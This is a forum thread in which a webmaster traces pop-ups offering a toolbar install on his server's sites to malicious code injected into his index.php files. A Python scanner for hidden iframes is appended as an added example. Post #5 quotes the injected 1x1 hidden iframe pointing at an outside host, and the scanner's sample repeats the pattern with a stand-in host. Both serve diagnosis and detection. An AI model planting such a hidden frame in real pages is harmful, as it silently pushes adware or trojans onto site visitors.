Thread: Website hijack

    #1
    Website hijack


    Is it possible that a website completely coded by us is hijacked by some sort of Toolbar installer?

    Since last week I got a very annoying popup at almost all of our sites and I don't have any idea where it comes from. It tries to install an XXX toolbar.

    I already updated/ran Adaware and Norton Antivirus on my PC and visited the sites on a clean installed laptop but the problem persists.

    Does anyone have an idea?

    http://www.bruggebusiness.com/
  2. #2
    Do you see anything weird in any of your website's directories? (i.e.: anything you yourself didn't put there?)
  4. #3
    Originally Posted by jacktasia
    Do you see anything weird in any of your website's directories? (i.e.: anything you yourself didn't put there?)
    Nope, already checked code and content of the FTP, but I just noticed something very ugly ...

    Looks like almost all sites hosted on our dedicated server have this problem. Guess I could best contact our system admin.

    Any other suggestions?
  6. #4
    Originally Posted by [ArcanE]
    Looks like almost all sites hosted on our dedicated server have this problem. Guess I could best contact our system admin.
    I would contact him as soon as possible, because I don't think anyone else would be able to fix it.
  8. #5
    Looks like I found the problem. Somehow some malicious code has nested itself inside my index.php files.

    <IFRAME SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 HEIGHT=1></IFRAME>

    This code explains the nasty popups.
    I'm gonna have to check the workstations at the office to see if this problem occurred before or after upload. Hope it happened before, else we might be in a very bad situation with a server infected with some nasty adware/trojans.
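
A way to sweep every site on the server for the kind of invisible frame found in post #5, as an added example that is not part of the original thread. The function names, the file-suffix list, the 0/1-pixel heuristic and the sample host `injected.example` are assumptions made for illustration; each hit carries the file's modification time so it can be compared with the last known upload.

```python
import re
from datetime import datetime, timezone
from pathlib import Path
from urllib.parse import urlparse

# Heuristics (assumptions for this example): a frame is "hidden" when it is
# 0 or 1 pixel wide/high, or styled display:none / visibility:hidden.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
TINY_RE = re.compile(r"[01](?:px)?", re.IGNORECASE)
CSS_HIDE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
WEB_SUFFIXES = {".php", ".html", ".htm", ".inc", ".tpl"}

def parse_attrs(tag):
    """Return the tag's attributes as a dict with lower-cased names."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(tag)}

def is_hidden(attrs):
    """True if either dimension is 0 or 1 pixel, or the frame is hidden through CSS."""
    tiny = any(TINY_RE.fullmatch(attrs.get(d, "")) for d in ("width", "height"))
    return tiny or bool(CSS_HIDE_RE.search(attrs.get("style", "")))

def find_hidden_iframes(text, allowed_hosts=()):
    """Return (line_number, src_host, tag) for each hidden iframe not on the allow-list."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        host = urlparse(attrs.get("src", "")).hostname or ""
        if is_hidden(attrs) and host not in allowed_hosts:
            findings.append((text.count("\n", 0, m.start()) + 1, host, m.group(0)))
    return findings

def scan_tree(root, allowed_hosts=()):
    """Scan web files under root; returns (path, line_number, src_host, mtime_utc)."""
    report = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_SUFFIXES:
            text = path.read_text(errors="replace")
            mtime = datetime.fromtimestamp(path.stat().st_mtime, timezone.utc).isoformat()
            for lineno, host, _tag in find_hidden_iframes(text, allowed_hosts):
                report.append((str(path), lineno, host, mtime))
    return report

# Constructed sample: one legitimate visible frame and one injected 1x1 frame.
SAMPLE = """<html><body>
<iframe src="https://maps.example.org/embed" width="600" height="400"></iframe>
<?php include 'menu.php'; ?>
<IFRAME SRC="http://injected.example/fa/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
</body></html>"""
```

Running `scan_tree` over the document roots of all hosted sites shows how widely the tag was written and whether the modification times cluster after the last legitimate upload.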
